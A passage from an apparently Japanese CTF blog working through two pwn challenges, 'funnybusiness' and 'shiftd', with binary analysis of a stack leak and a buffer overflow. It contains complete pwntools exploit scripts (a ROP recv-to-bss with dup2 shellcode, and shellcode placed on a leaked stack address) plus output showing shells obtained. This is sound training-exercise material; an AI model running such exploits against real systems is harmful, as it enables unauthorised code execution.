.eh_frame_hdr PROGBITS 0804901c 00101c 000084 00 A 0 0 4 [17] .eh_frame PROGBITS 080490a0 0010a0 0002b8 00 A 0 0 4 [18] .ctors PROGBITS 0804af0c 001f0c 000008 00 WA 0 0 4 [19] .dtors PROGBITS 0804af14 001f14 000008 00 WA 0 0 4 [20] .jcr PROGBITS 0804af1c 001f1c 000004 00 WA 0 0 4 [21] .dynamic DYNAMIC 0804af20 001f20 0000d0 08 WA 6 0 4 [22] .got PROGBITS 0804aff0 001ff0 000004 04 WA 0 0 4 [23] .got.plt PROGBITS 0804aff4 001ff4 000074 04 WA 0 0 4 [24] .data PROGBITS 0804b068 002068 000010 00 WA 0 0 4 [25] .bss NOBITS 0804b080 002078 004058 00 WA 0 0 32 [26] .comment PROGBITS 00000000 002078 00002a 01 MS 0 0 1 [27] .shstrtab STRTAB 00000000 0020a2 0000ec 00 0 0 1
Exploitを書く
#!/usr/bin/env python # -*- coding:utf-8 -*- from pwn import * import struct import zlib host = 'localhost' port = 49681 conn = remote(host, port) bss_addr = 0x804b080 elf = ELF('./funnybusiness') ret_addr = elf.plt['recv'] shellcode = asm(shellcraft.dupsh(4)) shellcode += asm(shellcraft.sh()) call_recv = p32(ret_addr) + p32(bss_addr) + p32(4) + p32(bss_addr) + p32(len(shellcode)) + p32(0) payload = "BBBBBB" # ret_addrを7文字目から置くため payload += call_recv comp_payload = zlib.compress(payload,0) conn.send(p32(len(comp_payload))) conn.send(comp_payload) conn.send(shellcode) conn.interactive()
fork-server型なのでシェルコードを送る前に,dup2などを使って自分が使用しているsocketディスクリプタを繋げてあげる必要がある.
これをしないとシェルは奪えても何も表示されない.
実行して無事シェル起動.
mattun-mart@4ctf:~/pwn/baby/funnybusiness$ python exploit.py
[+] Opening connection to localhost on port 49681: Done
[*] '/home/mattun-mart/pwn/baby/funnybusiness/funnybusiness'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
FORTIFY: Enabled
[*] Switching to interactive mode
$ ls -a
.
..
.bash_logout
.bashrc
.profile
pwnlist baby shiftd
下調べ
shiftd: ELF 64-bit LSB executable x86-64 version 1 (SYSV) dynamically linked (uses shared libs) for GNU/Linux 2.6.24 BuildID[sha1]=910854336439f51f20ebad1a772e36df392012ab stripped
$ checksec.sh --file shiftd RELRO STACK CANARY NX PIE RPATH RUNPATH FILE Partial RELRO No canary found NX disabled Not an ELF file No RPATH No RUNPATH shiftd
実行ファイルはUbuntu14.04 64bitで動作させてる.
NXやSSPが無効でいろいろできそう.ストリップされてるのが面倒だなぁ.
解析
実行すると入力待ちになるので,てきとうに入力してみる...終了した.
仕方がないので,objdump,gdb-peda等を駆使してバイナリの中身を解析していく.
入力した値と文字列"NowIsTheWinterOfOurDiscountTent"と比較して,一致した場合は処理を進めている.
再度実行し,NowIsTheWinterOfOurDiscountTentを入力すると,次は名前を聞かれるのでテキトーに入力.
Welcome to Shifty's Time Formatting Service! What is your name? aaaa Welcome, aaaa�!
なんか文字化けしている.バグあるっぽい.ひとまず詳しい解析は後にして,そのまま処理を進める.
time formatを入力しろと言われるのでテキトーに入力.
Please provide a time format: %p Your formatted time is: PM Thank you! Come again!
指定されたtimeフォーマットが表示されて終了.
その後詳しく動作を解析すると,次のような流れで動作するようだ.
- 1回目の入力内容と文字列"NowIsTheWinterOfOurDiscountTent"を比較して,一致した場合処理を進める.
- 2回目の入力で名前を入力
- 3回目の入力でtime formatを入力
- time関数,localtime関数を使って現在時刻を取得
- 入力されたtime formatの内容に基づいてstrftime関数を用いて時刻を表示.
それでどこにバグがあるかというと,名前入力とformat time入力にそれぞれバグがある.
名前入力のバグ
入力文字数は最大16文字と制限されていて問題ない.
しかし,入力された文字の末尾にNULL文字を挿入していないため,文字列以降のデータ(\x00がくるまで)も読み込まれてしまっている.
運のいいことに改行だけ入力してみると,スタックアドレスをリークしてくれる.
どうやら,先ほど比較に使用した文字列"NowIsTheWinterOfOurDiscountTent"のスタックアドレス0x7fffffffdef0を表示しているらしい.
Exploitを書くときに使えそう.
format time入力のバグ
入力可能文字数がとんでもなくでかい.
0x400931: mov rax,QWORD PTR [rip+0x200730] # 0x601068 0x400938: mov rcx,rax 0x40093b: and ecx,0x7fffffff # 入力の最大値 => 0x400941: lea rax,[rbp-0x420] # 入力内容を保存する領域 0x400948: mov edx,0xa 0x40094d: mov rsi,rcx 0x400950: mov rdi,rax 0x400953: call 0x4007f4 #入力関数
入力関数を呼び出す前に,入力内容を保存する領域を0x420の大きさで確保しているが,入力関数の入力可能文字数を指定する引数に与えている値は0x77DD4868.
このバイナリはSSPが無効なので余裕でバッファオーバーフローできる.
スタックの中は次の図のような感じになっているので,format timeの入力の際0x428番目からリターンアドレスを指定すれば好きなように書き換えられる.
あとはExploit組み立てればOK.
Exploit
このバイナリはNXが無効になっているため,どこかにシェルコードを積んで,実行してあげればよさそう.
どこに積むかが問題だが,幸いスタック内のアドレスをリークできているのでこれを使えば,format timeの入力内容を確保しているスタックのアドレスを計算できる.
format timeの入力内容を確保しているスタックのアドレスとリークしたスタックのアドレスのoffsetは0x440だった.
ってことで,Exploitコード.
#!/usr/bin/env python # -*- coding:utf-8 -*- from pwn import * import struct context.arch = 'amd64' conn = process('./shiftd') conn.send('NowIsTheWinterOfOurDiscountTent\n') conn.recv() conn.send('\n') conn.recvuntil('Welcome, ') name = conn.recv(6) leak_stack_addr = u64(name + '\x00\x00') target_addr = leak_stack_addr - 0x440 shellcode = asm(shellcraft.sh()) payload = shellcode payload += "A" * (0x428 - len(shellcode)) payload += p64(target_addr) payload += '\n' conn.send(payload) conn.interactive()
結果
mattun-mart@4ctf:~/pwn/baby/shiftd$ python exploit.py [+] Starting local process './shiftd': pid 13700 [*] Switching to interactive mode ! Please provide a time format: Your formatted time is: jhH\xb8/bin///sPH\x89�hri\x814$1�V^H�VH\x89�1�j;X\x0f\x05AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Thank you! Come again! $ ls dump exploit.py peda-session-shiftd.txt shiftd
pwnlist baby 村人A
解けた...が常設CTFなのでまとめることができない.
ハリネズミ本をやったことがあればすぐに解ける.
